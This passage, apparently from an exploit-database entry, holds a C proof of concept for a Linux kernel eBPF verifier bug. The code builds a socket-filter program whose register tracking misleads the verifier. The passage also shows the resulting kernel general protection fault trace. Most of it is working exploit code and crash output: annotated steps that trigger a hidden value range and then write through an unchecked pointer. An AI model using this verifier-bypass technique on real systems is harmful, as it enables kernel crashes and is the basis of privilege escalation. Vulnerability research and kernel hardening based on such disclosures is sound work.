BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r3 with value in range [0x0, 0xf], actually 0x8:\r\n // first load map value pointer...\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // ... then write, read, mask map value\r\n // (tracing actual values through a map is impossible)\r\n BPF_MOV32_IMM(BPF_REG_3, 8),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),\r\n BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),\r\n\r\n // load r1=0xffff'fff8 while working around the first verifier bug\r\n BPF_MOV32_IMM(BPF_REG_1, 0xfffffff8>>1),\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_1),\r\n\r\n // r1 in range [0xffff'fff8, 0x1'0000'0007]\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),\r\n\r\n // load r2=0\r\n BPF_MOV32_IMM(BPF_REG_2, 0),\r\n\r\n // trigger verifier bug:\r\n // visible range: [0xffff'fff8, 0xffff'ffff]\r\n // hidden range: [0, 7]\r\n // actual value: 0\r\n BPF_ALU32_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\r\n\r\n // collapse down: verifier sees 1, actual value 0\r\n BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 31),\r\n\r\n // flip: verifier sees 0, actual value 1\r\n BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\r\n BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -1),\r\n\r\n // r1 = 0x1000'0000'0000'0000, verifier sees 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 60),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badtrunc crasher_badtrunc.c\r\n-Wall && ./crasher_badtrunc\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere's the resulting crash:\r\n\r\n======================================\r\n[ 117.274571] general protection fault: 0000 [#2] SMP KASAN\r\n[ 117.274575] Modules linked in: binfmt_misc snd_hda_codec_generic\r\nqxl snd_hda_intel snd_hda_codec ttm snd_hda_core drm_kms_helper\r\nsnd_hwdep crct10dif_pclmul snd_pcm drm crc32_pclmul\r\nghash_clmulni_intel snd_timer pcbc aesni_intel aes_x86_64 snd\r\ncrypto_simd evdev glue_helper soundcore ppdev cryptd virtio_balloon sg\r\nvirtio_console serio_raw parport_pc parport pcspkr button ip_tables\r\nx_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto sr_mod sd_mod cdrom\r\nata_generic 8139too ehci_pci virtio_pci crc32c_intel ata_piix uhci_hcd\r\npsmouse virtio_ring virtio floppy ehci_hcd libata usbcore scsi_mod\r\n8139cp i2c_piix4 mii\r\n[ 117.274640] CPU: 1 PID: 1197 Comm: crasher_badtrun Tainted: G B\r\nD 4.15.0-rc1+ #4\r\n[ 117.274642] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[ 117.274645] task: 00000000a02f12e8 task.stack: 0000000051644a73\r\n[ 117.274651] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[ 117.274654] RSP: 0018:ffff8801af4e7838 EFLAGS: 00010292\r\n[ 117.274657] RAX: 0000000000000000 RBX: ffffc90001305108 RCX: ffffffff928483d7\r\n[ 117.274659] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac81e0f8\r\n[ 117.274661] RBP: ffff8801af4e7968 R08: 0000000000000000 R09: 0000000000000000\r\n[ 117.274664] R10: 0000000000000001 R11: ffffed003dfa0601 R12: ffffffff932be980\r\n[ 117.274666] R13: 1ffff10035e9cf0e R14: 00000000deadbeef R15: 0fff8801ac81e0f8\r\n[ 117.274669] FS: 00007f3efe927700(0000) GS:ffff8801f7640000(0000)\r\nknlGS:0000000000000000\r\n[ 117.274671] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 117.274674] CR2: 00005654507a9008 CR3: 00000001ec086003 CR4: 00000000001606e0\r\n[ 117.274678] Call Trace:\r\n[ 117.274685] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274688] ? bpf_jit_compile+0x30/0x30\r\n[ 117.274693] ? alloc_skb_with_frags+0x90/0x2c0\r\n[ 117.274697] ? __bpf_prog_run32+0x83/0xc0\r\n[ 117.274700] ? __bpf_prog_run64+0xc0/0xc0\r\n[ 117.274705] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274710] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[ 117.274715] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[ 117.274720] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274724] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274728] ? sock_alloc_inode+0x46/0x110\r\n[ 117.274731] ? unix_stream_connect+0x840/0x840\r\n[ 117.274734] ? __sock_create+0x7f/0x2c0\r\n[ 117.274737] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274742] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[ 117.274746] ? __wake_up_common_lock+0xaf/0x130\r\n[ 117.274752] ? unix_stream_connect+0x840/0x840\r\n[ 117.274755] ? sock_sendmsg+0x6b/0x80\r\n[ 117.274759] ? sock_write_iter+0x11d/0x1d0\r\n[ 117.274762] ? sock_sendmsg+0x80/0x80\r\n[ 117.274768] ? do_raw_spin_unlock+0x86/0x120\r\n[ 117.274782] ? iov_iter_init+0x77/0xb0\r\n[ 117.274786] ? __vfs_write+0x23e/0x340\r\n[ 117.274799] ? kernel_read+0xa0/0xa0\r\n[ 117.274805] ? __fd_install+0x5/0x160\r\n[ 117.274809] ? __fget_light+0x9b/0xb0\r\n[ 117.274813] ? vfs_write+0xe9/0x240\r\n[ 117.274817] ? SyS_write+0xa7/0x130\r\n[ 117.274820] ? SyS_read+0x130/0x130\r\n[ 117.274823] ? lockdep_sys_exit+0x16/0x8e\r\n[ 117.274827] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[ 117.274831] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274836] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[ 117.274885] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801af4e7838\r\n[ 117.274888] ---[ end trace e84b3275ee7b48c9 ]---\r\n======================================\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/29285", "cvss": {"score": 0.0, "vector": "NONE"}}]}